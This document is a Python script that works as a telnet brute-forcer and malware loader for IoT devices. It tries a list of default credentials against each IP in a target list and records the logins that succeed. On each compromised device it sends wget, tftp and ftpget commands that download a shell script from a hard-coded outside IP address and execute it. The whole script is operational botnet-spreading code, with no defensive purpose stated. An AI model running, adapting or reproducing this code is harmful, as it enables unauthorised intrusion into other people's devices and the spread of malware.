#!/usr/bin/python
import threading
import sys, os, re, time, socket, random,  select
if len(sys.argv) < 4:
    print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
    sys.exit()

wget = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.196/update.sh -O update.sh; busybox wget http://185.10.68.196/update.sh -O update.sh; chmod 777 update.sh; sh update.sh; rm -rf update.sh" #wget command to send
tftp = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r update.sh -g 185.10.68.196; busybox tftp -r update.sh -g 185.10.68.196; chmod 777 update.sh; sh update.sh; rm -rf update.sh" #tftp command to send
ftpget = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 185.10.68.196 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 185.10.68.196 update.sh update.sh; chmod 777 update.sh; sh update.sh; rm -rf update.sh"

combo = [ 
        "root:root",
        "root:",
        "admin:admin",
        "support:support",
        "user:user",
        "admin:",
        "admin:password",
        "root:vizxv",
        "root:admin",
        "root:xc3511",
        "root:888888",
        "root:xmhdipc",
        "root:default",
        "root:juantech",
        "root:123456",
        "root:54321",
        "root:12345",
        "root:pass",
        "ubnt:ubnt",
        "root:klv1234",
        "root:Zte521",
        "root:hi3518",
        "root:jvbzd",
        "root:anko",
        "root:zlxx.",
        "root:7ujMko0vizxv",
        "root:7ujMko0admin",
        "root:system",
        "root:ikwb",
        "root:dreambox",
        "root:user",
        "root:realtek",
        "root:00000000",
        "admin:1111111",
        "admin:1234",
        "admin:12345",
        "admin:54321",
        "admin:123456",
        "admin:7ujMko0admin",
        "admin:1234",
        "admin:pass",
        "admin:meinsm",
        "admin:admin1234",
        "root:1111",
        "admin:smcadmin",
        "admin:1111",
        "root:666666",
        "root:password",
        "root:1234",
        "root:klv123",
        "Administrator:admin",
        "service:service",
        "supervisor:supervisor",
        "guest:guest",
        "guest:12345",
        "guest:12345",
        "admin1:password",
        "administrator:1234",
        "666666:666666",
        "888888:888888",
        "tech:tech",
        "mother:fucker"
]

IPs = open(sys.argv[1], "r").read().replace("\r", "").split("\n")
random.shuffle(IPs)

threads = int(sys.argv[2])
output_file = sys.argv[3]

def readUntil(tn, string, timeout=8):
    buf = ''
    start_time = time.time()
    while time.time() - start_time < timeout:
        buf += tn.recv(1024)
        time.sleep(0.1)
        if string in buf: return buf
    raise Exception('TIMEOUT!')

def recvTimeout(sock, size, timeout=8):
    sock.setblocking(0)
    ready = select.select([sock], [], [], timeout)
    if ready[0]:
        data = sock.recv(size)
        return data
    return ""

global active
active = 0
global fh
fh = open(output_file, "a")

class router(threading.Thread):
    def __init__ (self, ip):
        threading.Thread.__init__(self)
        self.ip = str(ip).rstrip('\n')
    def run(self):
        global active
        global fh
        active += 1
        username = ""
        password = ""
        cracked = False
        for passwd in combo:
            if cracked:
                break
            if ":n/a" in passwd:
                password=""
            else:
                password=passwd.split(":")[1]
            if "n/a:" in passwd:
                username=""
            else:
                username=passwd.split(":")[0]
            try:
                tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                tn.settimeout(0.5)
                tn.connect((self.ip, 23))
            except Exception:
                try:
                    tn.close()
                except:
                    pass
                break
            try:
                hoho = ''
                hoho += readUntil(tn, ":")
                if ":" in hoho:
                    tn.send(username + "\n")
                    time.sleep(0.1)
                hoho = ''
                hoho += readUntil(tn, ":")
                if ":" in hoho:
                    tn.send(password + "\n")
                    time.sleep(0.8)
                else:
                    pass
                prompt = ''
                prompt += tn.recv(8912)
                if ">" in prompt and "ONT" not in prompt:
                    success = True
                elif "#" in prompt or "$" in prompt or "root@" in prompt or ">" in prompt:
                    success = True
                else:
                    tn.close()
                if success == True:
                    try:
                        print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
                        cracked = True
                        fh.write(self.ip + ":23 " + username + ":" + password + "\n")
                        fh.flush()
                        tn.send("sh\r\n")
                        time.sleep(0.1)
                        tn.send("shell\r\n")
                        time.sleep(0.1)
                        tn.send("ls /\r\n")
                        time.sleep(1)
                        timeout = 8
                        buf = ''
                        start_time = time.time()
                        while time.time() - start_time < timeout:
                            buf += recvTimeout(tn, 8912)
                            time.sleep(0.1)
                            if "tmp" in buf and "unrecognized" not in buf:
                                f = open("infected.txt", "a")
                                f.write(self.ip + ":23 " + username + ":" + password + "\n")
                                f.close()
                                print "\033[32m[\033[31m+\033[32m] \033[33mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
                                tn.send(wget + "\r\n")
                                time.sleep(10)
                                tn.send(tftp + "\r\n")
                                time.sleep(10)
                                tn.send(ftpget + "\r\n")
                                time.sleep(10)
                                tn.close()
                                break
                        tn.close()
                        break
                    except:
                        tn.close()
                else:
                    tn.close()
            except Exception:
                tn.close()
        active -= 1

def worker():
    for IP in IPs:
        threadstarted = False
        while not threadstarted:
            if active < threads:
                try:
                    thread = router(IP)
                    thread.start()
                    threadstarted = True
                except:
                   pass

threading.Thread(target = worker, args = ()).start()
raw_input()
os.kill(os.getpid(), 9)